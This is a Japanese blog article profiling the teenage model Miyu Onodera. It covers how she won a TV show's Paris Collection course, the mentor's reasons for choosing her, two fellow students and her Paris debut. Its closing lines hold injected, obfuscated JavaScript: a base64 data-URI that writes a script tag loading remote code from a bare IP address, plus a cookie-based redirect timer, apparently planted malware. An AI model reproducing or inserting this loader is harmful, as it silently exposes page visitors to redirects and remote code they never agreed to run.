『林先生が驚く初耳学』という番組の大人気コーナー『パリコレ学』という企画で約半年近い授業の結果、生徒のうち一人だけパリコレにいけるという企画をやっており、見事にその切符を手に入れたのが、小野寺南友でした。

この経験を機に本格的にモデルとして活動していくであろう彼女の未来を期待して、今回は、小野寺南友のこれからの注目すべきポイントや人物像、パリコレ学の内容などもりだくさんで紹介していきたいと思います。

スポンサーリンク

モデルの道を目指したワケ

引用元:https://webkoara.com/model/3738/

それでは、小野寺南友の簡単なプロフィールをまずはご紹介いたします。

年齢 17歳

身長 177cm

体重 不明

特技 空手

出身地 福岡

引用元:http://sokuhooo.biz/anmika-21-3920

ちなみに「南友」とかいて「みゆ」と読むようです。

また、「ハーフ」とよく間違われるそうですが、自身のツイッターの投稿で聞かれた際に、「ハーフではありません」とはっきり回答しているとか。

小野寺南友の母親は昔、身長が高いことをコンプレックスに感じていた様子。

いまでこそ、身長の高い女性もフツーにいる時代になりましたが、昔は身長が高い女性はバカにされる時代もあったようなので。

そこで母親は、自分のように身長の高い娘に対し、コンプレックスに感じるのではなくそれを活かした仕事に就いてほしいと思うようになったようです。

そのため「モデルになったら?」と幼い頃から母親にずっと言われていたそう。

その影響もあってか彼女は物心ついたときからずっと「将来はモデルになる」と決意していた様子。

小野寺自身は、幼い頃から身長が高いことをむしろ長所と捉えていて、嫌だと思ったことはなかったそう。

(背の高い自分が好きだったらしい)

だからこそ、高身長を活かすことのできる仕事に憧れていたとか。

こうして幼い頃からモデルになると思い一筋に願い続けてきた小野寺は、「パリコレ学」に自分からすすんで応募したのです。

今回の企画に挑戦する前は、地元福岡や色々な地域のコンテストなどに参加するなどしてモデルとしての活動に邁進していた様子。

好きなブランドは?

もともと洋服が本当に大好きだという小野寺の好きなブランドは、「H &M」「ZARA」とのこと。

福岡のお嬢様学校に通っている模様

引用元:https://webkoara.com/model/4633/

学校の制服が、パリコレ学の放送の中に映りましたが、どうやら福岡県の「筑紫女学園高等学校」に通っている可能性が高いのではと言われているそうです。

ここは、山本美月や蒼井優の出身校としても有名とか。

(中高一貫校らしいです。)

また、福岡で行われた空手の大会で優勝するほどの実力もある様子。

パリコレ学での雄姿をたっぷりと

引用元:https://bluethree.net/?p=1737

引用元:https://wonderfulnomadolife.com/oyakudachi/2270/

コンポジット撮影の際、良いと思った瞬間が出てこない限り絶対シャッターは押さない」というルールのもと行われました。

そして、ただスカートをひらひらさせていただけの様子が気に食わず、シャッターを押されないという屈辱を味わった小野寺南友。

ですが、最後にカメラマンにつめより「もう一度お願いします!!」と志願。

その際、カメラマンにどういう風に魅せたいのか聞かれ、「エレガントな感じに魅せたいです。」と回答。

「そしたらさ、自分が思うエレガントなモデルさんを思い浮かべてそれをモデルに演じればいいんだよ」とアドバイスされます。

この瞬間、それまで周りに埋もれていた小野寺の状況が一変し、アンミカも驚くくらい生まれ変わります。

コシノジュンコがショー形式で学生たちをプロデュースした企画では、その人に一番合うと思う衣装を提供。

上記写真の衣装をみにまとった小野寺は、ランキング形式での評価で1位を獲得。

またコシノジュンコも「このままパリコレに出しても問題ない。そのままショーに出れる」と絶賛。

その後撮影したカラーのコンポジット撮影企画では、覚醒した小野寺南友がそこにはいました。

スポンサーリンク

選ばれた衝撃理由は?

引用元:https://webkoara.com/model/4001/

アンミカは、最終的に小野寺南友に決めた理由を「憑依体質に賭けてみたいと思った」と語っているようです。

オーディションの時から一つだけ私が気になっていたのが、彼女の「服に対するセンス」でした。Tシャツとデニムの最もシンプルなスタイルでも、自分が似合う丈とフィット感、ネックの形をわかっていて、バランスが良いんですよね。この子は服好きなんだなと感じて。撮影の時に、一度も同じ服を着なかったのも彼女だけだった。卒業式の回なんて、17歳とは思えない難しい格好で来たんですよ。誰かのアドバイスとかコーディネートしてもらった服でなくて、自分で考えて。頭もラーメンマンみたいに結んでてきて(笑)。

引用元:https://headlines.yahoo.co.jp/hl?a=20190318-00010001-fashions-life&p=4

なお、アンミカは「「あくまでパリコレ挑戦に関して私が推薦したい人」を選んでいるだけであって、他の選ばれなかった学院生がパリコレに挑戦できないとかいうワケではない。」と語っています。

パリコレのショーに出るには、必ず各ブランドの厳しいオーディションを受けなければならず、今回選ばれたからといってすぐ出れるワケではありません。

推薦後、パリのモデル事務所「UPMODELS」への所属が決定しました。

余談ですが、この人たちも注目

また、今回推薦されなかったメンツにもモデルとしてものすごい才能を秘めていた人がいました。

小野寺以外の8名の中で、個人的にオススメする人を2名今回は簡単に紹介します。

⭐︎門田玲

引用元:https://webkoara.com/model/4282/

引用元:https://twitter.com/hashtag/門田玲

アンミカが「小野寺さんか門田さんで最後まで悩み抜いた」とのこと。

門田はどの授業でも本当に輝いており、学院生の中でも実力が抜き出ていた(とくに後半)そうです。

悩んでいたとき、モデルの原点に立ち返ったアンミカ。

「モデルというのは、自分より服を主役にして魅せる仕事」とのこと。

そう思ったとき、門田はオーラがあまりにも出過ぎているため、”服よりも自分が目立っている”と言った状態だったそう。

一方の小野寺は得意の憑依体質が功を奏し、「自分より服が目立つ」能力を存分に持っているとか。

そのため、その点で差が見え、小野寺を推薦することに決めたんだとか。

しかし、アンミカは門田さんも是非、パリコレ挑戦してほしい!と本気で思うくらい本当に魅力的な人のようです。

本人も絶対挑戦すると多いに意気込んでいるので、今後は小野寺のよきライバルとして君臨することを期待しています。

ちなみに視聴者の予想では、「門田さんが行くのでは」という意見が一番多かったようです。

なので、小野寺が選ばれ意外に思っている視聴者も多い模様。

ですが、選んだ理由を聞き、個人的には納得してしまいました。

でも、負けないで是非今後パリコレにトライしてほしいです。

なお、札幌のモデル事務所に所属しており、現在はそちらで北海道を中心にモデル活動を行っている模様。

スポンサーリンク

⭐︎中島彩香(なかじまさやか)

引用元:https://trend.yikn8643.com/nakasimasayaka-anmika-3065

引用元:http://wataruvt.com/model/2013/

最初はなかなか実力の芽が出ず、苦戦をかなり強いられていた彼女ですが、途中で人生の中でトレードマークにしていた自慢のロングヘアーをバッサリカットし、紫色のベリーショートヘアに変身。

するとたちまち半端ないかっこよさが身についてきて、モデルとして一気に才能が開花してきたのです。

アンミカは、彼女を推薦してもいいと思っていたみたいですが、ストイックすぎてかパリコレの基準であるBMI値が足りておらず、(つまり規定より痩せすぎているということ)推薦がしたくてもできなかったとのこと。

ただ、SNSなどの反応を見る限りは、彼女のカッコよくなった姿に惚れる視聴者も多かった模様。

現在、『Ray』の読者モデルも務めている(髪切ってから出番減った?)ようで、ショーモデルだけでなく、雑誌などのモデルとしても活動してます。

パリコレデビューの結果は?

引用元:https://wonderfulnomadolife.com/oyakudachi/2270/

オーディションをたくさん受け、最終的に非公式ブランド「リトコフスカヤ」と公式ブランド「each other」で合格をもらい、パリコレデビューを果たしました。

緊張したと言ってはいたものの初めてのパリコレデビューとしてはかなり堂々とした出で立ちで観覧していた先輩モデルたちも関心する様子だった模様。

オーディションの様子もテレビで放送していましたが、その人にフィットした服を見つけるためにただウォーキングするだけではなく、たくさんの衣装を着て審査するなど様々バラエティーに飛んだ感じですごく勉強になりました。

世間の反応は?

引用元:https://trend.yikn8643.com/onoderamiyu-anmika-2461

ネットで小野寺南友について調べると「かわいくない」という言葉をやたら見かけます。

個人的にはそんなこともないと思っているのですが、こればかりは人の感性だから仕方ない。

ですが、モデルというのはかわいいだけでは務まらない職業だと思うのです。

結構「かわいくないのにモデルやってる」って人も普段から見かけると思うのですが、可愛いからできるのではなく、「服を魅せるための能力が備わっているからできる」って感じなのではないでしょうか。

小野寺は、現に「かわいくはない、でもかっこいい」と言われているみたいで。

それで、正解なような気がします。

逆に可愛いだけのモデルは、たいしたことないと思ってしまいます。

スポンサーリンク

これからの小野寺南友はどうなる?大胆予想

引用元:https://www.youtube.com/watch?v=RcG8MVkl_Ww

引用元:https://twitter.com/miyuonodera_

引用元:https://picsoci.com/u/wwd_jp

これからは、パリコレに出場した経験を活かし、それこそ冨永愛などのように世界的に活躍する本格的なモデルになるべく活動を行っていくでしょう。

個人的には、無知すぎて恐縮ですが、パリコレだけでなく雑誌のモデルなどとしても活躍してほしいなと思うのですが、どうなんでしょうか。

世間的には、「かわいくないのに」という評判もあるかと思いますが、そういった意見は、人のこのみもありますから決して否定することはできないかなとは思います。

しかしながら、顔面うんぬんよりも一番大事なのは、モデルとしての才能ですから、これからはそういう外野の声を黙らせるくらいかっこよく、モデルとしてとことん生きていってほしいです。

ちなみに、今後の目標として、小野寺南友は、「今後もパリコレにチャレンジしていきたい」と言っていますから、きっと現在所属している海外のモデル事務所を通して、今後もパリコレのオーディションに積極的に挑戦していくのだろうと思っています。

まだまだ若く、これから大きい可能性をいっぱい秘めていると思いますので、モデルとしてどんどん大きくなっていく姿に期待しています。

あくまでも番組で一人に選ばれたことはスタートラインにたてるチャンスをもらっただけ

そしてパリコレデビューができたことでやっとスタートラインに立てました。

なので、初心を忘れずに邁進していっていただけたら嬉しいです。

):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('